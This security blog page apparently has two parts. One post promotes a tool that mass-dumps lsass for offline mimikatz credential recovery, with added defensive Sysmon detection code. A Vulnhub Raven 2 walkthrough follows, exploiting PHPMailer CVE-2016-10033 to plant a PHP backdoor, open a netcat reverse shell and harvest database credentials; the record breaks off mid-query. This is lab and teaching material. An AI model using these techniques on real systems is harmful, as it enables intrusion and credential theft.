Recently I have had a lot of success with the procdump technique: dump lsass on a compromised machine, retrieve the dump file, and process it offline to recover credentials.
When I used this during an engagement it ultimately led me to Domain Admin (DA), so I've found it very useful ever since.
I've written a Python tool to automate it. Run it against a single target, or against a list of IPs/hostnames.
It will upload procdump, dump lsass and download the dump file.
Check it out here:
https://github.com/n33dle/humptydumpty/
The idea is that once you have some authenticated access in a domain (say, local administrator on all workstations), this tool lets you quickly collect lsass dumps from a list of remote machines.
I stress: dumping lsass can in the worst case crash the host (BSOD), so take care when flying this across a network! It is also loud: procdump is a well-known Sysinternals binary, and most EDR products alert on any process that opens lsass with read access (Sysmon Event ID 10 records the same thing). On hosts with LSA Protection (RunAsPPL) the handle is simply denied, and with Credential Guard the reusable secrets are isolated away from lsass in the first place.
Running each dump file through mimikatz can then yield additional credentials within the network. Note that the cleartext passwords under wdigest below only appear where WDigest credential caching is still enabled (older builds, or UseLogonCredential set to 1); on current builds expect NTLM hashes and Kerberos tickets instead.
For example:
mimikatz # sekurlsa::Minidump humpty-10.1.1.5.dmp
Switch to MINIDUMP : 'humpty-10.1.1.5.dmp'
mimikatz # sekurlsa::logonPasswords full
Opening : 'humpty-10.1.1.5.dmp' file for minidump...
<snip>
wdigest :
* Username : victim3
* Domain : vulnerable
* Password : NonHackable
<snip>
* Username : victim2
* Domain : vulnerable
* Password : TheEarthIsRound!
<snip>
* Username : victim
* Domain : vulnerable
* Password : TheEarthIsFlat!
<snip>
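As an added example (the editor's, not code from this post or from humptydumpty), here is the defensive counterpart of the technique above: a small Python triage of Sysmon Event ID 10 (ProcessAccess) records that flags non-allowlisted processes opening lsass.exe with PROCESS_VM_READ, the right that procdump's MiniDumpWriteDump call needs. The event text is constructed in the shape of Sysmon's rendered event data (real field names, made-up paths, PIDs and times); the allowlist and the staging-path heuristic are assumptions to tune per estate.

```python
"""Triage Sysmon Event ID 10 (ProcessAccess) records for lsass credential dumping.

Editor's added example; not code from the post or from humptydumpty. SAMPLE_LOG is
constructed in the shape of Sysmon's rendered event data (real field names, made-up
paths, PIDs and times). ALLOWLIST and STAGING_HINTS are assumptions to tune.
"""
from dataclasses import dataclass
from typing import Dict, List

# Process access rights from winnt.h. Reading lsass memory (what MiniDumpWriteDump,
# and therefore procdump -ma, does) requires PROCESS_VM_READ; procdump usually asks
# for PROCESS_ALL_ACCESS.
PROCESS_VM_READ = 0x0010
PROCESS_ALL_ACCESS = 0x1FFFFF

# Assumed allowlist of images that open lsass during normal operation on this build.
# Extend per estate (EDR/AV agents, for instance) after baselining.
ALLOWLIST = {
    r"c:\windows\system32\csrss.exe",
    r"c:\windows\system32\wininit.exe",
}

# Path fragments that suggest a dropped tool rather than an installed product (assumption).
STAGING_HINTS = ("\\temp\\", "\\users\\", "\\programdata\\", "\\perflogs\\")

# Constructed sample: a procdump run, a legitimate csrss open, a query-only handle
# from Task Manager, and a renamed dumper staged in a user's temp directory.
SAMPLE_LOG = """\
Process accessed:
UtcTime: 2019-09-23 10:15:02.123
SourceProcessId: 4120
SourceImage: C:\\Windows\\Temp\\procdump64.exe
TargetProcessId: 652
TargetImage: C:\\Windows\\system32\\lsass.exe
GrantedAccess: 0x1FFFFF
CallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+9d234|C:\\Windows\\System32\\KERNELBASE.dll+2f3e6

Process accessed:
UtcTime: 2019-09-23 10:15:03.001
SourceProcessId: 560
SourceImage: C:\\Windows\\system32\\csrss.exe
TargetProcessId: 652
TargetImage: C:\\Windows\\system32\\lsass.exe
GrantedAccess: 0x1FFFFF
CallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+9d234

Process accessed:
UtcTime: 2019-09-23 10:16:44.777
SourceProcessId: 3388
SourceImage: C:\\Windows\\system32\\taskmgr.exe
TargetProcessId: 652
TargetImage: C:\\Windows\\system32\\lsass.exe
GrantedAccess: 0x1400
CallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+9d234

Process accessed:
UtcTime: 2019-09-23 10:20:10.500
SourceProcessId: 5012
SourceImage: C:\\Users\\bob\\AppData\\Local\\Temp\\pd.exe
TargetProcessId: 652
TargetImage: C:\\Windows\\system32\\lsass.exe
GrantedAccess: 0x1010
CallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+9d234
"""


@dataclass
class Alert:
    utc_time: str
    source_image: str
    granted_access: int
    reason: str


def parse_sysmon_text(text: str) -> List[Dict[str, str]]:
    """Split 'Key: Value' event blocks (blank-line separated) into one dict per event."""
    events, current = [], {}
    for line in text.splitlines():
        line = line.strip()
        if not line:
            if current:
                events.append(current)
                current = {}
            continue
        key, sep, value = line.partition(":")
        if sep:
            current[key.strip()] = value.strip()
    if current:
        events.append(current)
    return events


def detect_lsass_access(events: List[Dict[str, str]]) -> List[Alert]:
    """Flag handles to lsass.exe that carry PROCESS_VM_READ from a non-allowlisted image."""
    alerts = []
    for ev in events:
        target = ev.get("TargetImage", "").lower()
        source = ev.get("SourceImage", "").lower()
        if not target.endswith("\\lsass.exe"):
            continue
        try:
            access = int(ev.get("GrantedAccess", "0"), 16)
        except ValueError:
            continue
        if not access & PROCESS_VM_READ:
            continue  # query-only handles cannot read credential material
        if source in ALLOWLIST:
            continue
        reason = "lsass opened with PROCESS_VM_READ by non-allowlisted image"
        if access == PROCESS_ALL_ACCESS:
            reason = "lsass opened with PROCESS_ALL_ACCESS (procdump-style) by non-allowlisted image"
        if any(hint in source for hint in STAGING_HINTS):
            reason += "; source image runs from a user-writable staging path"
        alerts.append(Alert(ev.get("UtcTime", "?"), ev["SourceImage"], access, reason))
    return alerts


if __name__ == "__main__":
    for alert in detect_lsass_access(parse_sysmon_text(SAMPLE_LOG)):
        print(f"{alert.utc_time} {alert.source_image} 0x{alert.granted_access:X}: {alert.reason}")
```

The access-mask check is deliberately a bit test rather than a list of known masks (0x1010, 0x1410, 0x1FFFFF and so on): any handle with PROCESS_VM_READ can read credential material, whatever else it was granted.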
}==[n33dle]>----
Monday 23 September 2019
Sunday 3 February 2019
Vulnhub Walkthrough - Raven: 2
It's been a while since I've made a post. Even longer since I've attempted another Vulnhub walk-through. Today I completed the latest boot2root from Raven.
You can download a copy of the VM from here:
https://www.vulnhub.com/entry/raven-2,269/#
So let's get straight into it.
--> MISSION
Raven 2 is an intermediate level boot2root VM. There are four flags to capture. After multiple breaches, Raven Security has taken extra steps to harden their web server to prevent hackers from getting in. Can you still breach Raven?
--> REC0N / ENUMERATION
Firstly, I find the IP address of the target machine using netdiscover. The target IP address is 192.168.253.132.
Now for a full 65K TCP port scan to get a quick idea of what ports are available:
root@kali:~# nmap -Pn -sS -n -v -p- 192.168.253.132
Starting Nmap 7.70 ( https://nmap.org ) at 2018-12-22 07:53 AEDT
Initiating ARP Ping Scan at 07:53
Scanning 192.168.253.132 [1 port]
Completed ARP Ping Scan at 07:53, 0.06s elapsed (1 total hosts)
Initiating SYN Stealth Scan at 07:53
Scanning 192.168.253.132 [65535 ports]
Discovered open port 22/tcp on 192.168.253.132
Discovered open port 111/tcp on 192.168.253.132
Discovered open port 80/tcp on 192.168.253.132
Discovered open port 52675/tcp on 192.168.253.132
Completed SYN Stealth Scan at 07:53, 2.14s elapsed (65535 total ports)
Nmap scan report for 192.168.253.132
Host is up (0.00058s latency).
Not shown: 65531 closed ports
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
111/tcp open rpcbind
52675/tcp open unknown
MAC Address: 00:0C:29:C6:56:E8 (VMware)
So, we have tcp/22, tcp/80, tcp/111 & tcp/52675. I now run an aggressive nmap scan (-A: version detection, OS detection, traceroute and the default NSE scripts) to enumerate the services sitting behind these ports.
root@kali:~# nmap -Pn -A -n -v -p- 192.168.253.132
Starting Nmap 7.70 ( https://nmap.org ) at 2018-12-22 07:54 AEDT
NSE: Loaded 148 scripts for scanning.
NSE: Script Pre-scanning.
Initiating NSE at 07:54
Completed NSE at 07:54, 0.00s elapsed
Initiating NSE at 07:54
Completed NSE at 07:54, 0.00s elapsed
Initiating ARP Ping Scan at 07:54
Scanning 192.168.253.132 [1 port]
Completed ARP Ping Scan at 07:54, 0.04s elapsed (1 total hosts)
Initiating SYN Stealth Scan at 07:54
Scanning 192.168.253.132 [65535 ports]
Discovered open port 80/tcp on 192.168.253.132
Discovered open port 111/tcp on 192.168.253.132
Discovered open port 22/tcp on 192.168.253.132
Discovered open port 52675/tcp on 192.168.253.132
Completed SYN Stealth Scan at 07:54, 2.27s elapsed (65535 total ports)
Initiating Service scan at 07:54
Scanning 4 services on 192.168.253.132
Completed Service scan at 07:54, 11.02s elapsed (4 services on 1 host)
Initiating OS detection (try #1) against 192.168.253.132
NSE: Script scanning 192.168.253.132.
Initiating NSE at 07:54
Completed NSE at 07:54, 0.20s elapsed
Initiating NSE at 07:54
Completed NSE at 07:54, 0.01s elapsed
Nmap scan report for 192.168.253.132
Host is up (0.00048s latency).
Not shown: 65531 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 6.7p1 Debian 5+deb8u4 (protocol 2.0)
| ssh-hostkey:
| 1024 26:81:c1:f3:5e:01:ef:93:49:3d:91:1e:ae:8b:3c:fc (DSA)
| 2048 31:58:01:19:4d:a2:80:a6:b9:0d:40:98:1c:97:aa:53 (RSA)
| 256 1f:77:31:19:de:b0:e1:6d:ca:77:07:76:84:d3:a9:a0 (ECDSA)
|_ 256 0e:85:71:a8:a2:c3:08:69:9c:91:c0:3f:84:18:df:ae (ED25519)
80/tcp open http Apache httpd 2.4.10 ((Debian))
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.4.10 (Debian)
|_http-title: Raven Security
111/tcp open rpcbind 2-4 (RPC #100000)
| rpcinfo:
| program version port/proto service
| 100000 2,3,4 111/tcp rpcbind
| 100000 2,3,4 111/udp rpcbind
| 100024 1 52675/tcp status
|_ 100024 1 55774/udp status
52675/tcp open status 1 (RPC #100024)
MAC Address: 00:0C:29:C6:56:E8 (VMware)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Uptime guess: 199.640 days (since Tue Jun 5 15:33:43 2018)
Network Distance: 1 hop
TCP Sequence Prediction: Difficulty=257 (Good luck!)
IP ID Sequence Generation: All zeros
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
From the results we can see:
- An SSH server sitting behind tcp/22 running OpenSSH 6.7p1 Debian 5+deb8u4 (the deb8u4 suffix points to Debian 8).
- An Apache webserver running Apache 2.4.10 on tcp/80.
- rpcbind on tcp/111 and the NFS status daemon (RPC program 100024) on tcp/52675.
- The server is probably running a Linux 3.2-4.9 kernel.
I run a Nikto scan against the webserver to provide a quick run-down of any obvious vulnerabilities:
root@kali:~# nikto -h 192.168.253.132
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP: 192.168.253.132
+ Target Hostname: 192.168.253.132
+ Target Port: 80
+ Start Time: 2018-12-22 07:57:27 (GMT11)
---------------------------------------------------------------------------
+ Server: Apache/2.4.10 (Debian)
+ Server leaks inodes via ETags, header found with file /, fields: 0x41b3 0x5734482bdcb00
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Apache/2.4.10 appears to be outdated (current is at least Apache/2.4.12). Apache 2.0.65 (final release) and 2.2.29 are also current.
+ Allowed HTTP Methods: GET, HEAD, POST, OPTIONS
+ OSVDB-3268: /img/: Directory indexing found.
The site hosts a WordPress install under /wordpress/, so I run WPScan against it:
WordPress Security Scanner by the WPScan Team
Version 3.4.1
Sponsored by Sucuri - https://sucuri.net
@_WPScan_, @ethicalhack3r, @erwan_lr, @_FireFart_
_______________________________________________________________
[+] URL: http://192.168.253.132/wordpress/
[+] Started: Sat Dec 22 09:18:01 2018
Interesting Finding(s):
[+] http://192.168.253.132/wordpress/
| Interesting Entry: Server: Apache/2.4.10 (Debian)
| Found By: Headers (Passive Detection)
| Confidence: 100%
[+] http://192.168.253.132/wordpress/xmlrpc.php
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
| References:
| - http://codex.wordpress.org/XML-RPC_Pingback_API
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner
| - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access
[+] http://192.168.253.132/wordpress/readme.html
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
[+] Upload directory has listing enabled: http://192.168.253.132/wordpress/wp-content/uploads/
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
[+] WordPress version 4.8.8 identified (Latest, released on 2018-12-13).
| Detected By: Emoji Settings (Passive Detection)
| - http://192.168.253.132/wordpress/, Match: 'wp-includes\/js\/wp-emoji-release.min.js?ver=4.8.8'
| Confirmed By: Meta Generator (Passive Detection)
| - http://192.168.253.132/wordpress/, Match: 'WordPress 4.8.8'
[i] The main theme could not be detected.
[+] Enumerating All Plugins
[i] No plugins Found.
[+] Enumerating Config Backups
Checking Config Backups - Time: 00:00:00 <==============================================================================================================================================================================> (21 / 21) 100.00% Time: 00:00:00
[i] No Config Backups Found.
[+] Finished: Sat Dec 22 09:18:04 2018
[+] Requests Done: 38
[+] Cached Requests: 6
[+] Data Sent: 7.229 KB
[+] Data Received: 24.328 KB
[+] Memory used: 51.105 MB
[+] Elapsed time: 00:00:02
root@kali:~#
A few things, but first I look at the detection of an uploads directory and navigate to it. Here I find my first flag located in ../2018/11/flag3.png:
I also notice in the server response (Burp screenshot) that the HTML comments reference the server as raven.local. In the past (my GoldenEye Vulnhub walkthrough was an example), you can sometimes bypass server-side filters by addressing the server with its FQDN. To do this, I add raven.local to my local hosts file:
root@kali:~# echo "192.168.253.132 raven.local" >> /etc/hosts
This doesn’t seem to help me or lead me anywhere, but I do it anyway 😊
After looking through the site for a while, I kick off a DirBuster directory scan. Quite a few results come back. To collapse the repeated subdirectories and list only the top-level entries, I run the following (the report's own header lines come through the filter too):
root@kali:~/Documents/raven# cat DirBusterReport-raven.local-80.txt | cut -d "/" -f 2 | sort -u
--------------------------------
about.html
contact.php
css
DirBuster 1.0-RC1 - Report
Directories found during testing:
Dirs found with a 200 response:
Dirs found with a 403 response:
Files found during testing:
Files found with a 200 responce:
Files found with a 301 responce:
Files found with a 403 responce:
Files found with a 500 responce:
icons
img
index.html
js
manual
.php
Report produced on Sat Feb 02 16:51:38 AEDT 2019
service.html
team.html
vendor
wordpress
The directory that instantly sticks out is the vendor directory. Looking around I find a PATH page here http://raven.local/vendor/PATH which leads me to flag1!
flag1{a2c1f66d2b8051bd3a5874b5b6e43e21}
I notice this is an installation directory of PHPMailer. Opening the http://raven.local/vendor/VERSION page I find it's running version 5.2.16.
root@kali:~# searchsploit phpmailer
--------------------------------------------------------------------------------------------------- ----------------------------------------
Exploit Title | Path
| (/usr/share/exploitdb/)
--------------------------------------------------------------------------------------------------- ----------------------------------------
PHPMailer 1.7 - 'Data()' Remote Denial of Service | exploits/php/dos/25752.txt
PHPMailer < 5.2.18 - Remote Code Execution (Bash) | exploits/php/webapps/40968.php
PHPMailer < 5.2.18 - Remote Code Execution (PHP) | exploits/php/webapps/40970.php
PHPMailer < 5.2.18 - Remote Code Execution (Python) | exploits/php/webapps/40974.py
PHPMailer < 5.2.19 - Sendmail Argument Injection (Metasploit) | exploits/multiple/webapps/41688.rb
PHPMailer < 5.2.20 - Remote Code Execution | exploits/php/webapps/40969.pl
PHPMailer < 5.2.20 / SwiftMailer < 5.4.5-DEV / Zend Framework / zend-mail < 2.4.11 - 'AIO' 'PwnScr | exploits/php/webapps/40986.py
PHPMailer < 5.2.20 with Exim MTA - Remote Code Execution | exploits/php/webapps/42221.py
PHPMailer < 5.2.21 - Local File Disclosure | exploits/php/webapps/43056.py
WordPress PHPMailer 4.6 - Host Header Command Injection (Metasploit) | exploits/php/remote/42024.rb
--------------------------------------------------------------------------------------------------- ----------------------------------------
Cha-ching. I think I'm onto something here. Rather than using the Metasploit module, I look at the Python exploit (40974.py).
Reading through the Python RCE and the CVE details (https://legalhackers.com/advisories/PHPMailer-Exploit-Remote-Code-Exec-CVE-2016-10033-Vuln.html):
In summary, the vulnerability (CVE-2016-10033) sits in PHPMailer's default transport, which sends through PHP's mail() function.
The application calls setFrom() with input from the sending user (this should be the sender's email address), and PHPMailer passes that address to mail() as the "-f<sender>" additional parameter; under the hood mail() hands the command line to sendmail via the shell. Looking around the site further, I find the contact.php page lets a visitor enter their email address, and I assume PHPMailer is what provides this service.
Vulnerable versions only run the address through PHP's escapeshellcmd(), which escapes shell metacharacters but leaves a balanced pair of double quotes alone. An address with a quoted local part (RFC 5322 allows one, so PHPMailer's address validation accepts it) therefore lets the attacker close the quoted part and append arbitrary sendmail options, such as -X to write a log file (carrying a PHP payload from the message body) into the web root.
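To make the mechanism concrete, here is an added Python model (the editor's, not PHPMailer's code or the exploit's) of what PHP does with PHPMailer 5.2.16's -f parameter: mail() applies escapeshellcmd() to its fifth argument, which escapes metacharacters but leaves a balanced pair of double quotes alone, so an address with a quoted local part is split by /bin/sh into extra sendmail options. PHP's default sendmail_path, the payload shape from the advisory and the backdoor path are assumptions; the hardened check mirrors the allowlist PHPMailer adopted in 5.2.20.

```python
"""Model of the PHPMailer < 5.2.18 sendmail argument injection (CVE-2016-10033).

Editor's added example: a Python re-implementation of the PHP behaviour involved, not
PHPMailer's or the exploit's code. Assumptions: PHP's default sendmail_path
('/usr/sbin/sendmail -t -i'), PHPMailer 5.2.16 passing '-f<Sender>' as mail()'s fifth
argument, and a constructed payload whose -X log path is arbitrary.
"""
import shlex
from typing import List, Optional

SENDMAIL_PATH = "/usr/sbin/sendmail -t -i"  # php.ini default on Debian (assumption)

# Shape of the address from the advisory: quoted local part containing a backslash,
# sendmail options separated by spaces, then an ordinary-looking domain. It passes
# PHPMailer's address validation because RFC 5322 allows quoted local parts.
PAYLOAD_FROM = '"attacker\\" -oQ/tmp/ -X/var/www/html/backdoor.php  some"@example.com'


def php_escapeshellcmd(s: str) -> str:
    """Python port of PHP's escapeshellcmd() (ext/standard/exec.c, non-Windows branch).

    Metacharacters get a backslash; a quote is escaped only when it has no partner,
    so a balanced pair of double quotes passes through untouched. That is the gap the
    exploit uses: the doubled backslash keeps the pair balanced for the shell too.
    """
    special = set('#&;`|*?~<>^()[]{}$\\\n\xff')
    out = []
    partner = None  # index of the quote that closes the currently open pair
    for i, ch in enumerate(s):
        if ch in '"\'':
            if partner is None:
                j = s.find(ch, i + 1)
                if j == -1:
                    out.append('\\')  # unpaired: neutralise it
                else:
                    partner = j       # paired: leave both ends alone
            elif i == partner:
                partner = None
            else:
                out.append('\\')
            out.append(ch)
        elif ch in special:
            out.append('\\' + ch)
        else:
            out.append(ch)
    return ''.join(out)


def vulnerable_sendmail_argv(sender: str) -> List[str]:
    """argv that /bin/sh builds for PHP mail() with additional_parameters '-f<sender>'.

    PHP escapeshellcmd()s the extra parameters, appends them to sendmail_path and runs
    the line through popen(), i.e. the shell. shlex.split reproduces the shell's
    word splitting for the result.
    """
    extra = php_escapeshellcmd("-f" + sender)
    return shlex.split(f"{SENDMAIL_PATH} {extra}")


def injected_options(argv: List[str]) -> List[str]:
    """Sendmail options that appear after the -f parameter: there should be none."""
    base = len(shlex.split(SENDMAIL_PATH)) + 1  # path args plus the -f argument itself
    return [a for a in argv[base:] if a.startswith("-")]


def is_shell_safe(s: str) -> bool:
    """Allowlist PHPMailer adopted in 5.2.20 (isShellSafe): ASCII letters, digits and @_-. only.

    The 5.2.18 fix merely switched to escapeshellarg() and was bypassed
    (CVE-2016-10045); rejecting anything outside this set is what closed it.
    """
    return s != "" and all((c.isascii() and c.isalnum()) or c in "@_-." for c in s)


def hardened_sendmail_argv(sender: str) -> Optional[List[str]]:
    """Post-fix behaviour: an unsafe Sender is not passed to sendmail at all."""
    if not is_shell_safe(sender):
        return None  # PHPMailer then calls mail() without the -f parameter
    return shlex.split(f"{SENDMAIL_PATH} -f{sender}")


if __name__ == "__main__":
    argv = vulnerable_sendmail_argv(PAYLOAD_FROM)
    print("vulnerable argv:", argv)
    print("injected options:", injected_options(argv))
    print("hardened:", hardened_sendmail_argv(PAYLOAD_FROM))
```

Run it and the vulnerable argv shows -oQ/tmp/ and -X/var/www/html/backdoor.php as separate sendmail arguments, which is exactly the split the page's exploit relies on to drop its PHP file under the web root.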
With this information I update the exploit's target URL (the contact.php form), the path the backdoor is written to (n33dle.php in the web root) and the reverse-shell callback (my Kali box on tcp/443), then run it:
root@kali:~/Documents/raven# python 40974.py
I open another terminal and create a netcat listener on tcp/443 to accept an incoming reverse shell:
root@kali:~# nc -lvp 443
listening on [any] 443 ...
To trigger the exploit, I execute the reverse shell by navigating to the uploaded n33dle.php file:
root@kali:~/Documents/raven# curl http://192.168.253.132/n33dle.php
And there you have it, a shell. Nice.
root@kali:~# nc -lvp 443
listening on [any] 443 ...
connect to [192.168.253.131] from raven.local [192.168.253.132] 41127
/bin/sh: 0: can't access tty; job control turned off
$ whoami
www-data
$ ifconfig
eth0 Link encap:Ethernet HWaddr 00:0c:29:c6:56:e8
inet addr:192.168.253.132 Bcast:192.168.253.255 Mask:255.255.255.0
inet6 addr: fe80::20c:29ff:fec6:56e8/64 Scope:Link
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
RX packets:208 errors:0 dropped:0 overruns:0 frame:0
TX packets:233 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1000
RX bytes:17195 (16.7 KiB) TX bytes:28320 (27.6 KiB)
lo Link encap:Local Loopback
inet addr:127.0.0.1 Mask:255.0.0.0
inet6 addr: ::1/128 Scope:Host
UP LOOPBACK RUNNING MTU:65536 Metric:1
RX packets:91 errors:0 dropped:0 overruns:0 frame:0
TX packets:91 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:0
RX bytes:13578 (13.2 KiB) TX bytes:13578 (13.2 KiB)
$ hostname
Raven
$
As usual, I spawn a python tty shell using:
$ python -c 'import pty; pty.spawn("/bin/bash")'
www-data@Raven:/var/www/html$
I also locate flag2.txt sitting in www-data’s home directory:
www-data@Raven:/var/www$ cat flag2.txt
cat flag2.txt
flag2{6a8ed560f0b5358ecf844108048eb337}
www-data@Raven:/var/www$
--> TIME TO PE
Let’s look at what OS and Kernel we’re running:
www-data@Raven:/var/www/html$ uname -ra
uname -ra
Linux Raven 3.16.0-6-amd64 #1 SMP Debian 3.16.57-2 (2018-07-14) x86_64 GNU/Linux
www-data@Raven:/var/www/html$ cat /etc/*release
cat /etc/*release
PRETTY_NAME="Debian GNU/Linux 8 (jessie)"
NAME="Debian GNU/Linux"
VERSION_ID="8"
VERSION="8 (jessie)"
ID=debian
HOME_URL="http://www.debian.org/"
SUPPORT_URL="http://www.debian.org/support"
BUG_REPORT_URL="https://bugs.debian.org/"
www-data@Raven:/var/www/html$
Debian 8 (Jessie) on Linux 3.16.0-6-amd64.
And a quick look at any additional users on the system:
www-data@Raven:/var/www/html$ cat /etc/passwd
cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-timesync:x:100:103:systemd Time Synchronization,,,:/run/systemd:/bin/false
systemd-network:x:101:104:systemd Network Management,,,:/run/systemd/netif:/bin/false
systemd-resolve:x:102:105:systemd Resolver,,,:/run/systemd/resolve:/bin/false
systemd-bus-proxy:x:103:106:systemd Bus Proxy,,,:/run/systemd:/bin/false
Debian-exim:x:104:109::/var/spool/exim4:/bin/false
messagebus:x:105:110::/var/run/dbus:/bin/false
statd:x:106:65534::/var/lib/nfs:/bin/false
sshd:x:107:65534::/var/run/sshd:/usr/sbin/nologin
michael:x:1000:1000:michael,,,:/home/michael:/bin/bash
smmta:x:108:114:Mail Transfer Agent,,,:/var/lib/sendmail:/bin/false
smmsp:x:109:115:Mail Submission Program,,,:/var/lib/sendmail:/bin/false
mysql:x:110:116:MySQL Server,,,:/nonexistent:/bin/false
steven:x:1001:1001::/home/steven:/bin/sh
There’s a michael and steven account. Let’s see what groups they’re members of:
www-data@Raven:/home$ id steven
id steven
uid=1001(steven) gid=1001(steven) groups=1001(steven)
www-data@Raven:/home$ id michael
id michael
uid=1000(michael) gid=1000(michael) groups=1000(michael),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),108(netdev)
www-data@Raven:/home$
Hmmm, nothing really of interest at this stage. Looking at their home directories, nothing interesting here either:
www-data@Raven:/$ ls -laR /home
ls -laR /home
/home:
total 16
drwxr-xr-x 4 root root 4096 Aug 13 13:51 .
drwxr-xr-x 22 root root 4096 Aug 13 07:38 ..
drwxr-xr-x 2 michael michael 4096 Aug 13 07:52 michael
drwxr-xr-x 2 root root 4096 Aug 13 14:20 steven
/home/michael:
total 20
drwxr-xr-x 2 michael michael 4096 Aug 13 07:52 .
drwxr-xr-x 4 root root 4096 Aug 13 13:51 ..
-rw-r--r-- 1 michael michael 220 Aug 13 07:52 .bash_logout
-rw-r--r-- 1 michael michael 3515 Aug 13 07:52 .bashrc
-rw-r--r-- 1 michael michael 675 Aug 13 07:52 .profile
/home/steven:
total 8
drwxr-xr-x 2 root root 4096 Aug 13 14:20 .
drwxr-xr-x 4 root root 4096 Aug 13 13:51 ..
www-data@Raven:/$
I run linuxprivchecker.py and analyse its output. I notice the WordPress wp-config.php file is world-writable and has been modified by www-data; clearly set up that way by the VM creator.
Reading its contents, I find the local DB creds:
www-data@Raven:/var/www$ cat /var/www/html/wordpress/wp-config.php
cat /var/www/html/wordpress/wp-config.php
<?php
/**
* The base configuration for WordPress
*
* The wp-config.php creation script uses this file during the
* installation. You don't have to use the web site, you can
* copy this file to "wp-config.php" and fill in the values.
*
* This file contains the following configurations:
*
* * MySQL settings
* * Secret keys
* * Database table prefix
* * ABSPATH
*
* @link https://codex.wordpress.org/Editing_wp-config.php
*
* @package WordPress
*/
// ** MySQL settings - You can get this info from your web host ** //
/** The name of the database for WordPress */
define('DB_NAME', 'wordpress');
/** MySQL database username */
define('DB_USER', 'root');
/** MySQL database password */
define('DB_PASSWORD', 'R@v3nSecurity');
/** MySQL hostname */
define('DB_HOST', 'localhost');
I also confirm a MySQL server is running locally:
www-data@Raven:/var/www$ netstat -tl
netstat -tl
Active Internet connections (only servers)
Proto Recv-Q Send-Q Local Address Foreign Address State
tcp 0 0 *:48453 *:* LISTEN
tcp 0 0 localhost:mysql *:* LISTEN
tcp 0 0 localhost:submission *:* LISTEN
tcp 0 0 *:sunrpc *:* LISTEN
tcp 0 0 *:ssh *:* LISTEN
tcp 0 0 localhost:smtp *:* LISTEN
tcp6 0 0 [::]:54187 [::]:* LISTEN
tcp6 0 0 [::]:sunrpc [::]:* LISTEN
tcp6 0 0 [::]:http [::]:* LISTEN
tcp6 0 0 [::]:ssh [::]:* LISTEN
Let’s try connecting:
www-data@Raven:/var/www$ mysql -h localhost -u root -p
mysql -h localhost -u root -p
Enter password: R@v3nSecurity
Welcome to the MySQL monitor. Commands end with ; or \g.
Your MySQL connection id is 41
Server version: 5.5.60-0+deb8u1 (Debian)
Copyright (c) 2000, 2018, Oracle and/or its affiliates. All rights reserved.
Oracle is a registered trademark of Oracle Corporation and/or its
affiliates. Other names may be trademarks of their respective
owners.
Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.
mysql> show databases;
show databases;
+--------------------+
| Database |
+--------------------+
| information_schema |
| mysql |
| performance_schema |
| wordpress |
+--------------------+
4 rows in set (0.00 sec)
mysql>
Awesome. Now let’s have a quick snoop around. Check the users:
mysql> use wordpress;
use wordpress;
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A
Database changed
mysql> show tables;
show tables;
+-----------------------+
| Tables_in_wordpress |
+-----------------------+
| wp_commentmeta |
| wp_comments |
| wp_links |
| wp_options |
| wp_postmeta |
| wp_posts |
| wp_term_relationships |
| wp_term_taxonomy |
| wp_termmeta |
| wp_terms |
| wp_usermeta |
| wp_users |
+-----------------------+
12 rows in set (0.00 sec)
mysql> select * from wp_users;
select * from wp_users;
+----+------------+------------------------------------+---------------+-------------------+----------+---------------------+---------------------+-------------+----------------+
| ID | user_login | user_pass | user_nicename | user_email | user_url | user_registered | user_activation_key | user_status | display_name |
+----+------------+------------------------------------+---------------+-------------------+----------+---------------------+---------------------+-------------+----------------+
